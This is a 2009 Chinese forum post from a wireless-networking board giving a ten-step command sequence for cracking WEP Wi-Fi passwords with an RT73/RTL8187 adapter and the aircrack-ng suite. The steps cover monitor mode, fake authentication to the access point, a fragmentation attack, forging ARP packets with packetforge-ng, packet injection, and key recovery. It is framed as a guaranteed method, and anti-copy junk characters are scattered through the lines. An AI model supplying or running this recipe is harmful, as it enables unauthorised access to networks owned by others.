上等兵
- 注册时间
- 2009-4-5
- 金币
- 78 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
今天帮朋友破解WEP加密,发现前几天回贴中第4条命令用错了,原贴是aireplay,正确的是airodump,现纠正过来:6 v, o! v& P* g' \7 g6 h
我用RTL8187成功破解几个无线信号后的总结,按此进行包你成功
6 t; q: f4 D) ^+ k tRT73无线网卡命令
, F, K" o# k1 rShell1:7 z) N# T" L' Z
1. ifconfig –a (查看PC的网卡)
- B( B# u( k5 z/ d6 L) S! \2. ifconfig –a rausb0 up (加载网卡驱动)3 U, R; X0 \' b1 r l
3. airmon-ng start rausb0 6 (激活网卡的monitor模式,6根据情况变化)6 o7 S: P4 X+ r7 U
4. airodump-ng --ivs –w name –c 6 rausb0 2 H% O" L, a1 R2 m; E6 j
(列出该频道的所有AP)
" I' }7 x: k' d4 aShell2:7 G8 H/ S, c8 ?* I# S, _% Z
5. iwconfig rausb0 rate 2M (降低网卡的速率)
% O1 e* {& ~& Y$ c- Y; W; x* K9 A/ A/ F6. aireplay-ng -1 0 –e ap_essid –a ap_mac –h pc_mac rausb0 % d0 {& {6 q* b0 e O
(用欺骗方式连上AP,ap_essid注意大小写)
2 K7 R ]" c/ a# [2 h7. aireplay-ng -5 –b ap_mac -h pc_mac rausb0 (抓获数据包后提示是否用该包模拟攻击,输入Y攻击,成功后显示fragment-****.xor文件)
' e7 v* k! O9 y4 G V4 `' J8. packetforge-ng -0 –a ap_mac –h pc_mac –k 255.255.255.255 –l 255.255.255.255 –y fragment-****.xor –w mrarp (-l为-L,别错了)) {& L, `/ n4 o, F. N
9. aireplay-ng -2 –r mrarp –x 256 rausb0 (发攻击包,一般#DAATE达到3万以后进行下一步,256可以更改为128、512、1024)7 M% C! m: x' y4 v# l4 ?8 H, `
Shell3:
, F0 x6 e* f+ ^- `9 `. A2 G* P10. aircrack-ng –n 64 –b ap_mac name-01.ivs (成功后显示密码的ASCII码)本文地址:http://forum.anywlan.com/thread-26169-1-1.html |
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2009-5-11 22:27
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2009-5-11 23:13
